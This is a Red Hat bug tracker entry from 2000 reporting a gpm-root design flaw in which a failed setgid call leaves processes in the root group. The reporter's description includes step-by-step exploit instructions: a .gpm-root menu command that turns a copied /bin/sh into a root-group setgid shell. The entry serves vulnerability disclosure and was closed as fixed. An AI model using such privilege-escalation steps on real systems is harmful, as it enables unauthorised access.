Bug 10340 - Exploit in gpm-root.
Exploit in gpm-root.
Product: Red Hat Linux
Classification: Retired
Component: gpm (Show other bugs)
All Linux
high Severity medium
: ---
: ---
Assigned To: Preston Brown
: Security
Depends On:
  Show dependency treegraph
Reported: 2000-03-24 21:24 EST by zurk
Modified: 2008-05-01 11:37 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 2000-05-08 16:47:29 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)

  None (edit)
Description zurk 2000-03-24 21:24:26 EST
A vulnerability exists in the gpm-root program, part of the gpm package.
 This package is used to enable mice on the consoles of many popular
 Linux distributions. The problem is a design error, caused when a
 programmer chose to attempt to revert to the running users groups,
 after having called setuid to the users id already. The setgid call fails,
 and the process maintains the groups the gpm-root program is running
 as. This is usually the 'root' group.

Exploit :
cp /bin/sh /tmp
 create a .gpm-root file in ~ with the following:
 button 1 {
 name "create a setgid shell"
 "setgid shell" f.bgcmd "chgrp root /tmp/sh; chmod 2755 /tmp/sh"

 click control-left mouse button, and click "setgid shell"
 execute /tmp/sh
Comment 1 Preston Brown 2000-05-08 16:47:59 EDT
this has been solved w/an errata.

Note You need to log in before you can comment on or make changes to this bug.